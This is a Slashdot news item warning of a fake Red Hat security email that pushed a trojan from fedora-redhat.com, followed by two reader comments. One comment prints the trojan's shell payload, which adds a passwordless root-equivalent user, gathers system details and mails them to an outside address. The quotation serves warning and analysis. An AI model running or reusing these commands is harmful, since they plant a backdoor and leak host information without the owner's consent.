Slashdot Mirror


Beware 'Fedora-Redhat' Fake Security Alert

rixdaffy writes "I just received an email from the 'Redhat Security Team' telling me that I needed to download some tar file from fedora-redhat.com. Besides the fact that I don't use Red Hat/Fedora, I immediately smelled something fishy. Maybe it's not the first trojan targeted at Linux users, but together with the official sounding domain, it could trick some users into downloading and running the binary. It looks like Red Hat is already aware of the issue." According to Red Hat's page, "These emails tell users to download and run an update from a users home directory. This fake update appears to contain malicious code." Update: 10/25 01:32 GMT by T : One borked link, unborked.

2 of 628 comments (clear)

  1. Re:Cry havoc! by sfire · · Score: 1, Redundant

    And how much you want to bet that the server was already hacked, and the real owner of the server is going to have to foot the bill?

  2. Here's my analysis by andfarm · · Score: 1, Redundant

    What a coincidence - I just analysed the same thing, having seen it through Full-Disclosure. Here's the critical section:

    echo "Inca un root frate belea: " >> /tmp/mama
    adduser -g 0 -u 0 -o bash >> /tmp/mama
    passwd -d bash >> /tmp/mama
    ifconfig >> /tmp/mama
    uname -a >> /tmp/mama
    uptime >> /tmp/mama
    sshd >> /tmp/mama
    echo "user bash stii tu" >> /tmp/mama
    cat /tmp/mama | mail -s "Inca o roata" root@addlebrain.com >> /dev/null
    rm -rf /tmp/mama

    In other words, it'll create a root-equivalent user called 'bash' and mailing some system info to root@addlebrain.com.

    --

    TANSTAAFI: There Ain't No Such Thing As A Free iPod.